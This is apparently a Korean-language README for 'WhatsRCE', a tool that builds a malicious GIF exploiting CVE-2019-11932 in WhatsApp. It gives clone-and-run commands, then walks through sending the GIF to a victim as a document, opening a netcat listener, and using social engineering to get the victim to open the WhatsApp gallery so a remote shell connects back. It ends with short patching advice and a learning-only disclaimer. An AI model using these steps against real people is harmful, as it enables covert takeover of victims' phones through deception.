WhatsRCE
이 도구는 CVE-2019-11932(WhatsApp 원격 코드 실행)용 페이로드를 자동으로 생성하는 도구입니다.
- GCC 자동 설치(무해한 명령어이며, 오픈소스이므로 직접 확인 가능)
- .GIF 파일로 저장
사용 방법?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
셸(Shell)을 얻는 방법?
- .GIF 파일을 피해자에게 이미지가 아닌 문서(DOCUMENT)로 전송합니다.
- WhatsRCE 도구에서 설정한 포트로 nc / netcat을 설정합니다. {nc -lnvp your_port}
- 피해자가 이 익스플로잇을 실행하도록 유도하는 사회공학(Social Engineering) 공격을 사용할 수 있습니다.
- 피해자에게 WhatsApp을 통해 갤러리를 열도록 지시하고, 피해자에게 사진을 보내도록 요청합니다(필수는 아니며, 갤러리에 접근하기만 하면 됩니다). 몇 초 후 피해자로부터 셸 연결을 받게 됩니다.
또는 아래 영상을 시청하세요.
데모 영상
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
위 링크에 접근할 수 없는 경우
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
이 공격을 예방하는 방법?
- WhatsApp을 최신 버전으로 업데이트하세요. (버전 2.19.244에서 패치됨)
- 모르는 사람으로부터 오디오, 이미지 등 모든 파일을 수신하지 마세요.
이 도구는 학습 목적으로만 제공되며, 범죄에 사용할 경우 발생하는 모든 결과에 대해 저는 책임을 지지 않습니다!